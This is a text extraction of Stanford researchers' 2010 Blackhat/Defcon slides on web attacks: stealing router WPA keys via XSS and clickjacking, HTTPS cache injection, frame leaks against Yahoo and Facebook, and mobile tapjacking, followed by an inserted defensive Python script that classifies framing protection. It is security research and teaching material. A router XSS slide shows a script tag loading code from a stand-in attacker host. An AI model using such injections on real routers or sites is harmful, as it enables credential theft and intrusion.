Bad memories - Blackhat & Defcon 2010
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Stanford University
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Catcher
Bad Memories leads to conflict
How to break a security mechanism
1. Find a design flaw
2. Exploit implementation vulnerability
3. Make it irrelevant (focus of this talk)
Irrelevant ?
Secure protocol Side Channel
Outline
• Breaking into a WPA network with a webpage
• Attacking HTTPS with cache injection
• Stealing private data with frame leak attacks
• Owning phone with clickjacking on steroids
Breaking into a WPA network with a Webpage
Toward a secure world ?
WEP WPA
Secret keys are still stored via a web interface
Some routers
Getting the key from a web page
Ads poisoning
http://blog.avast.com/2010/02/18/ads-poisoning-–-jsprontexi/
Browser same origin policy (SOP)
Read
Post
http://mail.google.com http://evil.com
Internet
Getting the key from a web page
.js
192.168.0.1
192.168.1.1
192.168.2.1
Same origin policy limitation
The same-origin policy prevents us from knowing what kind of authentication the router uses
Firefox vulnerabilities
Getting the key from a web page
<img src="e.jpg"/>
192.168.2.1:1372
Brand A, Model XY
Same origin policy limitation
The same-origin policy prevents us from reading the router's WPA key
Router XSS vulnerabilities (5 / 8 brands)
Getting the key from a web page
<script src="http://badguy.com/script.js"/>
No XSS ?
What if we can't find an XSS, or it is not exploitable?
No XSS ? No problem !
Use the clickjacking drag-and-drop attack by P. Stone!
8/8 Router brands are vulnerable to clickjacking
Where are you ?
• We've got the key, but where is the network?
There is an app for that!
Also found by Samy Kamkar
Firefox Locate me protocol
Behind the curtain
Firefox Locate me protocol
Wifi SSID: Victim
MAC address: E2:54:D7:1A
{ "host" : "Test", "radio_type" : "unknown", "request_address" : true, "version" : "1.1.0", "wifi_towers" : [ { "mac_address" : "E2:54:D7:1A", "ssid" : "Victim" } ] }
Does not accept POST XHR
{ "latitude" : 128.51, "longitude" : -58.23, "address" : "Victim location ..." }
Firefox Locate me protocol
{ "latitude" : 128.51, "longitude" : -58.23 }
WPA Breaker demo
Attacking HTTPS via cache injection
The “Plan”
• Background
• Cache Injection attack
• Defenses ?
• Bypassing the defenses
Anatomy of web page
html, jpg, js, flash
Browser caching
43% of the Alexa top 100,000 web sites use at least one external javascript library
Most used libraries
Google analytics
JQuery
swfobjects
Google syndication
Prototype
Quanta
Yahoo
Mootool
Addthis
Scriptaculous
Omniture
Dojo
Attack scenario
Later...
Attack scenario
Shared library and cache
A single cached malicious library leads to multiple compromised HTTPS sessions
jQuery, Google Analytics
Defending against injection attack
How to inject a malicious shared library ?
Trust the user
https://twitter.com
Comodo
92% of SSL certificates are invalid
Ivan Ristic, Qualys
Firefox Study
Site Identity
How many users click on the identity info?
9%
3.4%
1.4%
Mozilla
Weakening SSL warning
What about tricking the browser so it doesn’t display the standard warning ?
IE standard warning
IE : demo
IE: another inconsistency
Firefox standard warning
Firefox challenge
We are not able to remove the warning
![Page 105: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/105.jpg)
Clickjacking 101
![Page 106: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/106.jpg)
Clickjacking 101
![Page 107: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/107.jpg)
Clickjacking 101
![Page 108: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/108.jpg)
Firefox challenge solved
![Page 109: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/109.jpg)
Firefox challenge solved
Not being able to remove the warning doesn’t mean we can’t clickjack it
![Page 110: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/110.jpg)
Firefox clickjacking demo
![Page 111: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/111.jpg)
Stealing private data using frame leak attacks
![Page 112: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/112.jpg)
Clickjacking history
• Coined by J. Grossman and R. Hansen in 2008
• Scrolling attack by P. Stone in 2010
![Page 113: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/113.jpg)
Frame leak attack
src = http://www.m.yahoo.com
![Page 114: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/114.jpg)
Frame leak attack
src = http://www.m.yahoo.com
id="checkbox-29"
![Page 115: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/115.jpg)
leftScroll : 0
topScroll : 10
Frame leak attack
src = http://www.m.yahoo.com.com#checkbox-29
id="checkbox-29"
![Page 116: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/116.jpg)
Yahoo frame leak attack demo
![Page 117: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/117.jpg)
The Facebook clickjacking defense
![Page 118: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/118.jpg)
The Facebook clickjacking defense
www.badguy.com
![Page 119: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/119.jpg)
The Facebook clickjacking defense
www.badguy.com
![Page 120: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/120.jpg)
The Facebook clickjacking defense
![Page 121: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/121.jpg)
Facebook frame leak attack demo
![Page 122: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/122.jpg)
Vulnerability fixed
Facebook updated their clickjacking defense: they no longer display your info behind the black div
![Page 123: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/123.jpg)
Tapjacking: clickjacking on steroids
![Page 124: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/124.jpg)
54 million smartphones sold during Q1 2010
![Page 125: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/125.jpg)
Rise of smartphones (stats)
53% of Alexa top 500 websites have a mobile site
![Page 126: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/126.jpg)
Phone Usability
• Phone browsers provide specific usability features
• These features give the attacker complete control over the screen real estate
• The attacker can also zoom to the element of his choice
Yuan Niu, Francis Hsu, Hao Chen 2008
![Page 127: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/127.jpg)
Session handling
• Browsers kill session cookies, mobiles don’t
• Non-session cookies tend to live longer on mobile sites
![Page 128: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/128.jpg)
Phishing demo
![Page 130: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/130.jpg)
Spoofing the URL bar
![Page 131: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/131.jpg)
Tapjacking
![Page 132: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/132.jpg)
Tapjacking ?
![Page 133: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/133.jpg)
Tapjacking ?
Tapjacking = clickjacking on steroids
![Page 134: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/134.jpg)
[Chart: Clickjacking protection among Alexa Top sites, regular sites. X-axis: Top 10, Top 100, Top 500; Y-axis: 0% to 100%. Source: Alexa]
![Page 135: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/135.jpg)
[Chart: Clickjacking protection among Alexa Top sites, mobile sites. X-axis: Top 10, Top 100, Top 500; Y-axis: 0% to 100%. Source: Alexa]
![Page 136: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/136.jpg)
Tapjacking demo
![Page 138: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/138.jpg)
Vulnerability fixed
The Twitter mobile website now uses framebusting code
![Page 139: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/139.jpg)
Conclusion
• WPA key can be stolen from a web page
• Wifi network can be geo-localized within 500 meters
• Compromise SSL sessions using caching attacks
• A single injection allows targeting multiple web sites
• Break the same origin policy via Frame leak attack
• Tap-jacking : clickjacking on steroids for smartphones
• Mobile sites must prevent framing !
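An added example, not from the slides: a Python classifier of the kind a survey of framing protection across desktop and mobile sites could use, run here over constructed sample responses. The `X-Frame-Options` and CSP `frame-ancestors` checks, the framebusting regex and all function names are assumptions of this example; the slides themselves only mention framebusting code.

```python
import re

# Heuristic for JavaScript framebusting: top/parent compared with self/window.
_FRAMEBUST = re.compile(
    r"\b(?:top|parent)(?:\.location)?\s*!==?\s*(?:self|window)(?:\.location)?\b"
    r"|\b(?:self|window)(?:\.location)?\s*!==?\s*(?:top|parent)(?:\.location)?\b")

def frame_ancestors(csp):
    """Return the frame-ancestors source list of a CSP value, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None

def framing_protection(headers, body=""):
    """Classify one response as 'header', 'script-only' or 'none'."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("x-frame-options", "").strip().lower() in ("deny", "sameorigin"):
        return "header"
    # Only the enforcing CSP header counts; a Report-Only policy blocks nothing.
    sources = frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None and not {"*", "http:", "https:"} & set(sources):
        return "header"
    # Script-only protection depends on the page's script running inside the frame.
    return "script-only" if _FRAMEBUST.search(body) else "none"

# Constructed sample responses (not real captures): name -> (headers, body).
SAMPLES = {
    "desktop": ({"X-Frame-Options": "DENY"}, "<html></html>"),
    "mobile-js": ({"Content-Type": "text/html"},
                  "<script>if (top != self) { top.location = self.location; }</script>"),
    "mobile-open": ({"Content-Security-Policy": "default-src 'self'"}, "<html></html>"),
    "csp-none": ({"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"}, ""),
    "csp-wildcard": ({"Content-Security-Policy": "frame-ancestors *"}, ""),
}

def survey(samples):
    """Map each sample name to its framing-protection class."""
    return {name: framing_protection(h, b) for name, (h, b) in samples.items()}

if __name__ == "__main__":
    for name, verdict in survey(SAMPLES).items():
        print(f"{name:13} {verdict}")
```

A mobile host is a separate origin with its own responses, so it needs its own entry in such a survey even when the desktop site already scores `header`.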
![Page 140: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/140.jpg)
For the videos and the latest version of the slides go to
http://ly.tl/t9